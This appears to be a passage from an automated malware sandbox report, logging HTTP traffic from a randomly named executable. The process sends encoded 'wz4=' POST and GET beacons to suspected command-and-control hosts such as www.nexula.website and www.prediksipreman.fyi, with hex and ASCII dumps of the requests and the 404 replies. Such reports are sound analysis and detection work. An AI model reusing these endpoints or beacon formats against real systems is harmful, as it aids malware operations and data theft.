                                                                              Data Raw: 77 7a 34 3d 52 35 7a 4d 34 72 59 4d 47 66 36 51 66 66 47 47 31 48 43 6a 53 2f 55 62 72 30 46 44 6c 39 65 30 59 38 37 7a 4b 70 4e 68 45 46 71 55 70 59 44 38 71 48 48 4c 4d 6c 36 32 44 39 45 33 44 6c 67 71 64 75 57 7a 39 48 4e 55 68 76 66 69 38 79 70 56 33 32 52 77 64 38 79 6a 51 5a 39 62 4a 4c 67 62 43 73 50 48 43 43 74 37 74 31 31 79 71 55 6c 61 55 6e 66 62 55 64 33 5a 4d 45 73 34 67 56 68 31 69 46 51 30 6a 4a 69 38 4d 78 51 6c 35 2f 4b 44 6d 45 50 4e 42 6e 62 6d 71 35 52 4f 37 2b 4c 4f 49 6e 33 43 74 6e 7a 54 45 38 6e 5a 68 77 2f 4e 65 4c 73 77 6d 66 71 73 35 66 4c 54 4e 78 66 6a 4c 67 3d 3d
                                                                              Data Ascii: wz4=R5zM4rYMGf6QffGG1HCjS/Ubr0FDl9e0Y87zKpNhEFqUpYD8qHHLMl62D9E3DlgqduWz9HNUhvfi8ypV32Rwd8yjQZ9bJLgbCsPHCCt7t11yqUlaUnfbUd3ZMEs4gVh1iFQ0jJi8MxQl5/KDmEPNBnbmq5RO7+LOIn3CtnzTE8nZhw/NeLswmfqs5fLTNxfjLg==
                                                                              Jan 14, 2025 10:25:07.096520901 CET533INHTTP/1.1 404 Not Found
                                                                              Date: Tue, 14 Jan 2025 09:25:07 GMT
                                                                              Server: Apache
                                                                              Content-Length: 389
                                                                              Connection: close
                                                                              Content-Type: text/html
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              6192.168.2.45739567.223.117.142804944C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 14, 2025 10:25:09.049071074 CET726OUTPOST /ro4w/ HTTP/1.1
                                                                              Host: www.nexula.website
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Origin: http://www.nexula.website
                                                                              Referer: http://www.nexula.website/ro4w/
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Length: 220
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                                                                              Data Raw: 77 7a 34 3d 52 35 7a 4d 34 72 59 4d 47 66 36 51 63 2b 32 47 35 41 32 6a 56 66 55 59 79 55 46 44 75 64 65 6f 59 38 6e 7a 4b 6f 4a 78 45 7a 79 55 70 36 72 38 72 46 76 4c 42 46 36 32 4c 64 45 75 4f 46 67 68 64 75 62 47 39 43 31 55 68 72 33 69 38 79 5a 56 33 41 5a 7a 63 73 79 68 63 35 39 64 4e 4c 67 62 43 73 50 48 43 43 35 46 74 31 74 79 72 6b 56 61 4f 47 66 63 64 39 33 59 63 30 73 34 71 46 67 79 69 46 51 47 6a 49 2b 61 4d 33 63 6c 35 36 32 44 6d 56 50 4b 62 33 62 67 6e 5a 51 73 38 4d 43 51 4d 47 43 2f 6b 58 72 48 4d 73 2b 31 74 57 79 58 50 36 4e 6e 30 66 4f 66 6b 59 43 6e 41 79 69 71 51 69 6d 4e 44 47 5a 46 44 6c 48 35 42 43 59 4f 58 39 36 54 56 4b 6f 3d
                                                                              Data Ascii: wz4=R5zM4rYMGf6Qc+2G5A2jVfUYyUFDudeoY8nzKoJxEzyUp6r8rFvLBF62LdEuOFghdubG9C1Uhr3i8yZV3AZzcsyhc59dNLgbCsPHCC5Ft1tyrkVaOGfcd93Yc0s4qFgyiFQGjI+aM3cl562DmVPKb3bgnZQs8MCQMGC/kXrHMs+1tWyXP6Nn0fOfkYCnAyiqQimNDGZFDlH5BCYOX96TVKo=
                                                                              Jan 14, 2025 10:25:09.624825954 CET533INHTTP/1.1 404 Not Found
                                                                              Date: Tue, 14 Jan 2025 09:25:09 GMT
                                                                              Server: Apache
                                                                              Content-Length: 389
                                                                              Connection: close
                                                                              Content-Type: text/html
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              7192.168.2.45741167.223.117.142804944C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 14, 2025 10:25:11.594302893 CET10808OUTPOST /ro4w/ HTTP/1.1
                                                                              Host: www.nexula.website
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Origin: http://www.nexula.website
                                                                              Referer: http://www.nexula.website/ro4w/
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Length: 10300
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                                                                              Data Raw: 77 7a 34 3d 52 35 7a 4d 34 72 59 4d 47 66 36 51 63 2b 32 47 35 41 32 6a 56 66 55 59 79 55 46 44 75 64 65 6f 59 38 6e 7a 4b 6f 4a 78 45 7a 36 55 70 4a 54 38 71 69 62 4c 41 46 36 32 46 39 45 72 4f 46 67 77 64 74 72 64 39 43 78 75 68 70 2f 69 74 68 68 56 78 79 78 7a 53 73 79 68 55 5a 39 63 4a 4c 67 4f 43 73 2f 62 43 43 70 46 74 31 74 79 72 69 78 61 41 48 66 63 62 39 33 5a 4d 45 73 30 67 56 67 57 69 46 49 38 6a 49 4b 73 4d 48 38 6c 36 61 47 44 6a 6e 33 4b 44 6e 62 69 6d 5a 51 4b 38 4d 65 78 4d 47 65 6b 6b 55 33 74 4d 75 69 31 75 7a 72 2f 4c 35 56 44 33 5a 47 52 35 50 36 57 5a 54 2b 51 65 52 32 68 41 44 52 66 55 6b 48 37 4d 67 70 38 44 6f 58 55 4f 2f 37 53 30 73 66 49 66 37 71 4d 34 54 61 64 76 69 32 74 6d 7a 44 75 70 61 6f 43 77 64 51 72 4d 54 6c 6f 49 53 7a 4c 38 76 70 59 35 79 62 59 42 32 33 4b 48 6d 4e 65 35 48 37 44 79 5a 33 75 63 63 4d 6f 43 68 74 53 39 2f 73 4a 51 4b 6e 38 36 49 4c 78 37 37 51 36 6a 50 68 52 31 51 58 33 38 77 56 38 34 58 35 57 64 37 59 45 49 69 4b 4a 56 6a 71 55 33 2f 55 4b 6c 30 [TRUNCATED]
                                                                              Data Ascii: wz4=R5zM4rYMGf6Qc+2G5A2jVfUYyUFDudeoY8nzKoJxEz6UpJT8qibLAF62F9ErOFgwdtrd9Cxuhp/ithhVxyxzSsyhUZ9cJLgOCs/bCCpFt1tyrixaAHfcb93ZMEs0gVgWiFI8jIKsMH8l6aGDjn3KDnbimZQK8MexMGekkU3tMui1uzr/L5VD3ZGR5P6WZT+QeR2hADRfUkH7Mgp8DoXUO/7S0sfIf7qM4Tadvi2tmzDupaoCwdQrMTloISzL8vpY5ybYB23KHmNe5H7DyZ3uccMoChtS9/sJQKn86ILx77Q6jPhR1QX38wV84X5Wd7YEIiKJVjqU3/UKl0qWfe3UUg8Or8Nedepd2GeDTSUnAHi04goi2H5jv08o7mFwsHGw2pmH7B+lbGO2slq0pK6gDtCCdUF7Q6IbrfsSgb+kWUBqE7Wqy4Km6tM5h9p7lrXEH36t6xgRQx4MST01eHLu7cIJTbFkjogEvCjAS3Z5yMKBZw7fDAKro9IZtoaFOj08E7FtIRytkRuaq+b2dFhfJCputwhh6aCRi1U5q1aoCg0snfhS2FMHQ4t65zaUx4ASiBsiTDmwYJ3IyJHSnuTJ5D3He9e8Fw2yK1P4jOxnNBwLwOPB0CWVfoOpf6uvWynqAuDswfHwRXqwurSkX5uavchDaWh4VeLWKpRmG98zBrz0YmBvgV0eVLoVaq7gnR88U0wpVLtdRZolkIc9Ne2IWZQFvoQjt/y0r98uZzRHl5pKZ7De8/yY/3W2+2cKe96eZMsprVihqMkkNBOko50gL2+5Tb+NSc9TcOw728nSS/pc3Y0Ne4lhkXQKg1oSMKJTO3h0EiJH8hAcTkYvn0B0/thlY9auKGZLZGK4Nf2jMm1lEqPq/R+hKOc0dvji1fd2Kypr1Z8yOIqvhlGVAKRxS9ZYIMrPZNsMlJR4l2wj6LjJCvHaOlJtbnGhQF40Mv9WiocPYo6yBu/tPPflfS0ECrHriwZyLzwCunHQW0qBJQdSRoEf [TRUNCATED]
                                                                              Jan 14, 2025 10:25:12.197561979 CET533INHTTP/1.1 404 Not Found
                                                                              Date: Tue, 14 Jan 2025 09:25:12 GMT
                                                                              Server: Apache
                                                                              Content-Length: 389
                                                                              Connection: close
                                                                              Content-Type: text/html
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              8192.168.2.45742767.223.117.142804944C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 14, 2025 10:25:14.141410112 CET441OUTGET /ro4w/?wz4=c7bs7cBJE/6WeNDz6y7wfs4csA5ai8mWfunIFb5NDUjHoY3en1z9O1W0OakyKWwaCum+/W1z6qbtx3tl+iJ0V9nyUJg4fcAQQsDkMDUAlXZwvkRINEDVO9c=&OvV=2njD6f80EDOLQ8 HTTP/1.1
                                                                              Host: www.nexula.website
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Connection: close
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                                                                              Jan 14, 2025 10:25:14.747024059 CET548INHTTP/1.1 404 Not Found
                                                                              Date: Tue, 14 Jan 2025 09:25:14 GMT
                                                                              Server: Apache
                                                                              Content-Length: 389
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              9192.168.2.457463162.0.215.244804944C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 14, 2025 10:25:19.805500031 CET718OUTPOST /rpjd/ HTTP/1.1
                                                                              Host: www.prediksipreman.fyi
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Origin: http://www.prediksipreman.fyi
                                                                              Referer: http://www.prediksipreman.fyi/rpjd/
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Length: 200
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                                                                              Data Raw: 77 7a 34 3d 2f 4d 68 4a 59 67 43 32 30 48 64 71 2f 6c 34 4c 50 6c 34 72 62 7a 67 66 54 4b 5a 66 38 63 72 6f 47 33 2f 61 4a 61 46 59 72 30 79 44 49 6b 75 32 57 36 7a 54 66 46 76 67 55 36 67 6f 78 33 6f 31 4c 58 46 78 6d 74 77 6a 58 47 46 55 7a 69 37 59 43 71 6e 48 4e 58 34 52 55 4f 30 4f 43 6b 6b 39 58 32 38 30 79 30 78 76 4b 61 6e 53 61 54 4b 6b 7a 78 4d 59 50 7a 54 57 43 63 71 71 79 77 66 65 58 71 6f 64 4c 77 77 51 7a 4c 39 54 51 65 2f 74 6e 7a 38 76 6a 4c 43 4c 58 37 59 79 35 6a 35 76 4c 4e 2f 57 52 71 34 4b 32 7a 70 7a 6c 50 76 35 69 69 43 77 7a 64 49 53 33 50 34 72 6b 72 6e 79 64 41 3d 3d
                                                                              Data Ascii: wz4=/MhJYgC20Hdq/l4LPl4rbzgfTKZf8croG3/aJaFYr0yDIku2W6zTfFvgU6gox3o1LXFxmtwjXGFUzi7YCqnHNX4RUO0OCkk9X280y0xvKanSaTKkzxMYPzTWCcqqywfeXqodLwwQzL9TQe/tnz8vjLCLX7Yy5j5vLN/WRq4K2zpzlPv5iiCwzdIS3P4rkrnydA==
                                                                              Jan 14, 2025 10:25:20.684838057 CET1236INHTTP/1.1 404 Not Found
                                                                              keep-alive: timeout=5, max=100
                                                                              content-type: text/html
                                                                              transfer-encoding: chunked
                                                                              content-encoding: gzip
                                                                              vary: Accept-Encoding
                                                                              date: Tue, 14 Jan 2025 09:25:20 GMT
                                                                              server: LiteSpeed
                                                                              x-turbo-charged-by: LiteSpeed
                                                                              connection: close
                                                                              Data Raw: 31 33 35 41 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a eb 92 e2 4a 72 fe 7f 9e 02 b7 c3 f6 6e 68 7a 74 07 d1 db 3d bb ba 21 09 90 90 04 02 84 c3 71 42 e8 8e ae e8 0e 1b 7e 20 bf 86 9f cc 25 ba 7b 9a 66 ba cf cc 3a fc c3 35 3f 1a d5 25 2b 2b f3 cb cc 9a cc fa ed b7 df 1e ff 89 5b b0 2b 53 e5 07 41 95 c4 df 7e 7b 7c fe 33 00 ed 31 70 2d e7 db 6f 97 9f 89 5b 59 60 46 95 df bb c7 3a 6c 9e ee d8 2c ad dc b4 ba af 4e b9 7b 37 b0 9f bf 9e ee 2a b7 ab e0 9e c4 5f 06 76 60 15 a5 5b 3d d5 95 77 4f dd 7d 4a c7 b2 03 f7 be 5f 5f 64 f1 15 a1 34 bb b7 fb a1 4f 17 aa 85 e5 27 d6 3f b2 82 ef f2 b0 70 cb ab 25 c8 3b ea a9 95 b8 4f 77 4d e8 b6 79 56 54 57 d3 da d0 a9 82 27 c7 6d 42 db bd bf 7c 7c 19 84 69 58 85 56 7c 5f da 56 ec 3e a1 5f bf 93 aa c2 2a 76 bf 11 08 31 50 b2 6a 30 c9 ea d4 79 84 9f 3b 9f 45 59 56 a7 d8 1d f4 72 7b 11 97 5d 96 2f 7c f4 a2 de 67 ce 69 f0 f7 cb d4 fe b3 6f 1e 90 ce bd 67 25 61 7c 7a 18 d0 05 d8 f6 cb 40 74 e3 c6 ad 42 db fa 32 28 ad b4 bc 2f dd 22 f4 fe f2 e3 b2 32 3c bb 0f 03 94 c8 bb f7 [TRUNCATED]
                                                                              Data Ascii: 135AZJrnhzt=!qB~ %{f:5?%++[+SA~{|31p-o[Y`F:l,N{7*_v`[=wO}J__d4O'?p%;OwMyVTW'mB||iXV|_V>_*v1Pj0y;EYVr{]/|giog%a|z@tB2(/"2<qAEP/3Y0gO{&8#rq'V~U_-ne[@8Dnwzf>v= %RqIDYZae7}+{io{_-/+KY|AI?Z]V=$?Sg\_kw7Bkt7r=W3_w8MM.mYI7d#8'@Aa{y]a^^I[1w\;+^RwB7z8G{Oy-/ar^!11x(~k)X7niaz8,KX8^8;-)o3i+}dmyG;].Q>-1},vN?~0=_: +%n],yVCar+=tiz5
                                                                              Jan 14, 2025 10:25:20.684899092 CET1236INData Raw: 67 7c 42 a0 04 fe a6 86 37 7e fe 96 b8 4e 68 0d fe 94 00 47 fa a2 98 d1 90 ca bb 3f df 6c 73 8b da 9b e1 5e 78 79 56 5e 22 d4 c3 a0 70 63 e0 eb 9a 1b 03 ec e7 f4 1e 0b d8 4f fb 30 08 42 c7 71 d3 37 96 fa d1 be 5d c5 a7 0b b2 9f ed fa fd bc 37 f6
                                                                              Data Ascii: g|B7~NhG?ls^xyV^"pcO0Bq7]7}EG/CI?T^4u+"]G}H=u<^z?TWLR:|-d^c"gCgc3Y\We+z`
                                                                              Jan 14, 2025 10:25:20.684932947 CET1236INData Raw: c7 06 fc 36 5c 94 f8 78 0e 4b 66 1b 2e 3a 5d f4 5d 7e 66 27 7b 59 1a db b6 a8 b3 4e 67 b8 a6 95 4e 72 6d 2a 33 06 27 4d ba 16 b5 83 69 c8 d0 59 12 9d f1 8e c0 63 28 ad 37 42 b2 09 22 ad 44 ac a1 39 32 c5 b5 3b 1a 61 09 5a ed 62 83 e1 83 99 34 8e
                                                                              Data Ascii: 6\xKf.:]]~f'{YNgNrm*3'MiYc(7B"D92;aZb4i=y^,/ny*8NtLfZjE?\sa(XtE6A| E!HRv$TgZ$P.mg[tZF vF7Rwece1>n+[QX
                                                                              Jan 14, 2025 10:25:20.684968948 CET1236INData Raw: 62 8e 9d d1 86 00 46 ad 32 4d 7b 3e 2e e2 7a d5 04 1c b3 66 30 8b 90 4e 1d 4c 18 dd bc e8 28 3f 3b d9 1b c4 e0 fd 05 71 c2 e6 b8 08 19 31 b9 95 60 a2 c9 ec 61 b1 8b 68 9c c9 1b 3c 3d 78 4b 38 0d f4 11 85 02 d7 ac 0c 2b 62 e1 6e 3a ad ab a3 d4 af
                                                                              Data Ascii: bF2M{>.zf0NL(?;q1`ah<=xK8+bn:"h]'>VNvx/CEd!@ YQV?-,G4Y>#3CkoOvvUTPD;sf8JpS8&X u9*u@IZi5?jepK-R
                                                                              Jan 14, 2025 10:25:20.685003996 CET287INData Raw: c3 98 67 6b 7b cb 35 df 0d e0 9f 90 bf 3a d4 75 76 f9 93 b3 5c b3 ff 31 66 3f 83 d4 9f 5e 30 f5 e7 4f 45 71 39 ed 7b 45 5e 6f f7 3c fc 47 e2 02 b2 7c 27 81 67 39 dd 7d 7b 84 3f 5b f5 08 7f a4 9b 1b 34 7d c0 d7 95 67 78 65 f1 f1 b9 a2 f7 5e da bf
                                                                              Data Ascii: gk{5:uv\1f?^0OEq9{E^o<G|'g9}{?[4}gxe^W+r=@VY2}zn_4V'3;"`O}(IGV[\$$-|g>~/)~g0eCVovM3dKUJ@ppM=


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              10192.168.2.457479162.0.215.244804944C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 14, 2025 10:25:22.349761009 CET738OUTPOST /rpjd/ HTTP/1.1
                                                                              Host: www.prediksipreman.fyi
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Origin: http://www.prediksipreman.fyi
                                                                              Referer: http://www.prediksipreman.fyi/rpjd/
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Length: 220
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                                                                              Data Raw: 77 7a 34 3d 2f 4d 68 4a 59 67 43 32 30 48 64 71 74 33 73 4c 49 79 73 72 54 7a 67 65 4e 36 5a 66 6c 4d 72 73 47 33 7a 61 4a 62 42 75 72 47 6d 44 49 45 65 32 58 37 7a 54 61 46 76 67 63 61 67 70 2f 58 6f 2b 4c 58 49 45 6d 76 6b 6a 58 47 35 55 7a 6a 4c 59 46 62 6e 45 4d 48 34 66 4e 2b 30 4d 4e 45 6b 39 58 32 38 30 79 33 4e 46 4b 63 50 53 61 69 36 6b 79 54 30 62 4d 7a 54 58 46 63 71 71 32 77 66 43 58 71 70 36 4c 78 38 36 7a 4a 31 54 51 63 33 74 67 69 38 73 74 4c 43 4a 4a 4c 59 6a 78 57 51 63 4b 63 37 59 5a 4b 6f 73 30 69 5a 42 74 70 69 6a 7a 54 6a 6e 68 64 73 68 71 49 78 66 70 6f 61 37 47 4a 76 31 76 76 79 4d 64 38 41 4d 35 6a 44 36 36 37 38 69 34 55 73 3d
                                                                              Data Ascii: wz4=/MhJYgC20Hdqt3sLIysrTzgeN6ZflMrsG3zaJbBurGmDIEe2X7zTaFvgcagp/Xo+LXIEmvkjXG5UzjLYFbnEMH4fN+0MNEk9X280y3NFKcPSai6kyT0bMzTXFcqq2wfCXqp6Lx86zJ1TQc3tgi8stLCJJLYjxWQcKc7YZKos0iZBtpijzTjnhdshqIxfpoa7GJv1vvyMd8AM5jD6678i4Us=
                                                                              Jan 14, 2025 10:25:23.176243067 CET1236INHTTP/1.1 404 Not Found
                                                                              keep-alive: timeout=5, max=100
                                                                              content-type: text/html
                                                                              transfer-encoding: chunked
                                                                              content-encoding: gzip
                                                                              vary: Accept-Encoding
                                                                              date: Tue, 14 Jan 2025 09:25:22 GMT
                                                                              server: LiteSpeed
                                                                              x-turbo-charged-by: LiteSpeed
                                                                              connection: close
